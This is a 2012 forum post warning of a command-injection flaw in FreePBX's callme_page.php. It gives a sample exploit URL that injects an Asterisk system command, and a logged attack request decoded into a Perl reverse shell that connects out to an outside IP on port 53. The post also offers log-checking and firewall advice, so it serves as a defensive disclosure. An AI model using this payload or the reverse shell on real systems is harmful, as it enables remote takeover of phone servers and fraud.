Support A2Billing :

provided by Star2Billing S.L.

Support A2Billing :
It is currently Thu Mar 28, 2024 10:10 pm
Predictive Dialer


All times are UTC




Post new topic Reply to topic  [ 1 post ] 
Author Message
 Post subject: FreePBX Security Issues.
PostPosted: Thu Mar 29, 2012 1:30 am 
Offline
User avatar

Joined: Thu Sep 08, 2011 5:17 pm
Posts: 6
Location: Newcastle Upon Tyne, United Kingdom
Hi,

Just thought I'd let you all know of a security concern with FreePBX. For those of you who make the concious decision to run FreePBX and leave the web interface with a public IP address; I'd strongly recommend you at the very least you remove the /recordings interface.

We had a customers VPS server compromised and running through some logs we noticed a very worrying issue.

It appears the /recordings/misc/callme_page.php has a very serious sanitisation error.

What does that mean for me?

What it means is that someone with bad intentions can execute code as if they are the root user of the system and potentially gain access to your system.

How Do I prevent this?

Ideally the answer to this question would be to refrain from using FreePBX but in practice that's not always possible. I would suggest putting at the very least the Web interface behind a firewall/ACL.

So What does the hack look like?

Like so:

Code:
http://myfreepbx-ip/recordings/misc/callme_page.php?action=c&callmenum=1001@from
-internal/n%0D%0AApplication:%20system%0D%0AData:%20echo%20fucked%20>%20/var/www/html/recordings/misc/lol%0D%0A%0D%0A


All it's going to do is create a file in your recordings folder but non the less the plausibility is there for it to be used to compromise a full system. Once in they could easily gain access to MySQL and wreck havoc.

If you're running CentOS like us i'd sudgest running the following command

Code:
cat /var/log/httpd/access_log* | grep recordings


If you start to see anything with a very long URL after the callmenum querystring parameter then it's possible your box may be compromised as well.

Quote:
[root@voip02(/)> cat /var/log/httpd/access_log* | grep recordings
213.142.137.231 - - [25/Mar/2012:08:54:19 +0100] "GET /recordings/misc/callme_page.php?action=c&callmenum=1000@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22178.63.10.87%3a53%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A HTTP/1.0" 200 947 "-" "Python-urllib/1.17"


This translates to the following command being issued to asterisk:

Code:
/recordings/misc/callme_page.php?action=c&callmenum=1000@from-internal/n
Application: system
Data: perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"178.63.10.87:53");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'



Fingers crossed this will prevent at least one person from falling victim to these bastards and getting duped out of a lot of VoIP Credit.


Regards
Dean.


Top
 Profile  
 
Display posts from previous:  Sort by  
Post new topic Reply to topic  [ 1 post ] 
Predictive Dialer


All times are UTC


Who is online

Users browsing this forum: No registered users and 10 guests


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Search for:
Jump to:  
cron
Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group